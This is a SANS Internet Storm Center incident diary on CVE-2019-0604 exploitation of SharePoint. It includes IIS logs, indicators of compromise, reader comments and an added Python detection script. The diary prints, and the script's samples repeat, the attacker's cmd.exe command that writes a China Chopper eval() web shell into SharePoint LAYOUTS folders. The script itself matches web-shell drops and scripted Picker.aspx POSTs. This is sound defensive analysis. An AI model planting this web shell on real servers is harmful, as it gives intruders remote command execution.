
SANS ISC: CVE-2019-0604 Attack - SANS Internet Storm Center


CVE-2019-0604 Attack

Over the past week, I started seeing attacks on SharePoint servers using vulnerability CVE-2019-0604. The Zero Day Initiative has a great write-up(1) on the exploitation of this vulnerability.

Initial detection of the exploit came from endpoint exploit detection. When reviewing the IIS logs, we saw a POST to Picker.aspx. This appears to be the most common entry point for attacks exploiting CVE-2019-0604.

Initial Log

        2019-05-02 07:04:13 192.168.1.1 POST /_layouts/15/Picker.aspx - 443 - 121.147.96.8 python-requests/2.18.4 200 0 0 670

In the case of this attacker, they dropped a China Chopper payload on the server. China Chopper has been around for a long time; CrowdStrike did a great write-up(2) on it in 2015. The payload here is just a one-liner that was echoed into the files from the command line.

The anomaly that the endpoint detected was a cmd shell being spawned by the w3wp.exe process.

      Parent Process: w3wp.exe
      Process Name: cmd.exe

        "C:\Windows\System32\cmd.exe" /c echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\14\TEMPLATE\LAYOUTS\t.aspx" & echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\t.aspx" & echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\t.aspx"

The attack appears to be an automated drive-by: the attackers did not come back and make any additional modifications to the server.
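As an added example (not part of the original diary), the two observations above, an unauthenticated POST to Picker.aspx and w3wp.exe spawning cmd.exe to echo an ASPX one-liner into TEMPLATE\LAYOUTS, written as detection logic over constructed IIS W3C log lines and process-creation events. The field order, the sample log lines, the event dictionaries and the scripted-user-agent list are assumptions.

```python
import re

# Assumed IIS W3C field order (real logs declare it in a #Fields: header); IIS writes
# spaces inside a field as '+', so whitespace splitting yields one token per field.
IIS_FIELDS = ("date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username "
              "c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken").split()

# Constructed sample: a normal GET, the diary's scripted POST, and a legitimate authenticated POST.
SAMPLE_IIS_LOG = [
    "2019-05-02 07:03:59 192.168.1.1 GET /_layouts/15/start.aspx - 443 DOMAIN\\alice 10.0.0.5 Mozilla/5.0+(Windows+NT+10.0) 200 0 0 120",
    "2019-05-02 07:04:13 192.168.1.1 POST /_layouts/15/Picker.aspx - 443 - 121.147.96.8 python-requests/2.18.4 200 0 0 670",
    "2019-05-02 07:05:02 192.168.1.1 POST /_layouts/15/Picker.aspx - 443 DOMAIN\\bob 10.0.0.7 Mozilla/5.0+(Windows+NT+10.0) 200 0 0 310",
]
# Constructed process-creation events (parent, child, command line) in the shape of the diary's alert.
SAMPLE_EVENTS = [
    {"parent": "w3wp.exe", "process": "cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\t.aspx"'},
    {"parent": "explorer.exe", "process": "cmd.exe", "cmdline": r'"C:\Windows\System32\cmd.exe" /c dir C:\inetpub'},
]

PICKER_PATH = re.compile(r"/_layouts/\d+/picker\.aspx$", re.IGNORECASE)
SCRIPTED_UA = re.compile(r"^(python-requests|curl|go-http-client)", re.IGNORECASE)
# The drop pattern from the diary: a shell writing an .aspx file into TEMPLATE\LAYOUTS, or an eval() one-liner.
LAYOUTS_ASPX = re.compile(r'TEMPLATE\\LAYOUTS\\[^"\s]+\.aspx', re.IGNORECASE)
ASPX_EVAL = re.compile(r"eval\(Request", re.IGNORECASE)


def parse_iis_line(line):
    """Map one W3C log line onto IIS_FIELDS; None for comment lines or malformed rows."""
    parts = line.split()
    if len(parts) != len(IIS_FIELDS):
        return None
    return dict(zip(IIS_FIELDS, parts))


def suspicious_picker_posts(lines):
    """Return (client IP, user agent) for POSTs to Picker.aspx that are anonymous or from a scripted client."""
    hits = []
    for line in lines:
        rec = parse_iis_line(line)
        if not rec or rec["cs-method"] != "POST" or not PICKER_PATH.search(rec["cs-uri-stem"]):
            continue
        if rec["cs-username"] == "-" or SCRIPTED_UA.match(rec["cs(User-Agent)"]):
            hits.append((rec["c-ip"], rec["cs(User-Agent)"]))
    return hits


def webshell_drop_events(events):
    """Return child process names where w3wp.exe spawned a shell that writes an .aspx into LAYOUTS."""
    return [ev["process"] for ev in events
            if ev["parent"].lower() == "w3wp.exe"
            and ev["process"].lower() in ("cmd.exe", "powershell.exe")
            and (LAYOUTS_ASPX.search(ev["cmdline"]) or ASPX_EVAL.search(ev["cmdline"]))]
```

The authenticated browser POST in the sample is deliberately left unflagged, since Picker.aspx is also used by legitimate people-picker requests.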


IOCs

Attacker IPs:
121[.]147[.]96[.]8
211[.]222[.]223[.]14
119[.]65[.]36[.]2

User agent string: python-requests/2.18.4

Chopper files created:
"%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\t.aspx"
"%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\t.aspx"
"%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\14\TEMPLATE\LAYOUTS\t.aspx"


(1) https://www.thezdi.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability
(2) https://www.crowdstrike.com/blog/chopping-packets-decoding-china-chopper-web-shell-traffic-over-ssl/

Thanks to my team for the analysis.

--

Tom Webb

@twsecblog

Can we directly get the MAC/IPs of the attackers?
Great analysis.

Also, please attach pretty-formatted logs. It would help me.
bkdroid13
Let me cover the complete update here.

The hacker group attacked Microsoft SharePoint servers to exploit the newly fixed vulnerability and access corporate and government networks, according to security advisories recently sent by security agencies in Canada and Saudi Arabia.

The security flaw exploited in this attack is tracked as CVE-2019-0604, which was corrected by Microsoft in security updates released in February, March, and April of this year.

"An attacker who successfully exploits a vulnerability can run arbitrary code in the context of the SharePoint application collection and the server account of the SharePoint farm," Microsoft said at the time.

A demonstration exploit for CVE-2019-0604 was released in March by Markus Wulftange, the security researcher who discovered the vulnerability, but other PoCs also appeared on GitHub and Pastebin.

The attacks began shortly after the end of April. The Canadian Cyber Security Centre first issued a warning last month, and officials from the Saudi National Cybersecurity Center (NCSC) issued a second security warning this week.

The two cybersecurity agencies reported seeing an attacker take control of a SharePoint server and install a web version of China Chopper, a type of malicious software installed on a server that allows hackers to connect to it and issue various commands.


via: https://www.hows.tech/
bkdroid13